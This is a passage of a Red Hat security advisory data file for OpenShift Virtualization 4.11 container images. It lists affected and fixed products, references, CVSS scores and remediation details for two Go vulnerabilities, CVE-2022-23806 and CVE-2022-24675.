"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23806", }, { category: "external", summary: "RHBZ#2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23806", url: "https://www.cve.org/CVERecord?id=CVE-2022-23806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.1, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", }, { cve: "CVE-2022-24675", cwe: { id: "CWE-120", name: "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')", }, discovery_date: "2022-04-21T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2077688", }, ], notes: [ { category: "description", text: "A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/pem: fix stack overflow in Decode", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope.\n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang & go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-24675", }, { category: "external", summary: "RHBZ#2077688", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077688", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-24675", url: "https://www.cve.org/CVERecord?id=CVE-2022-24675", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", url: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", }, ], release_date: "2022-04-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the 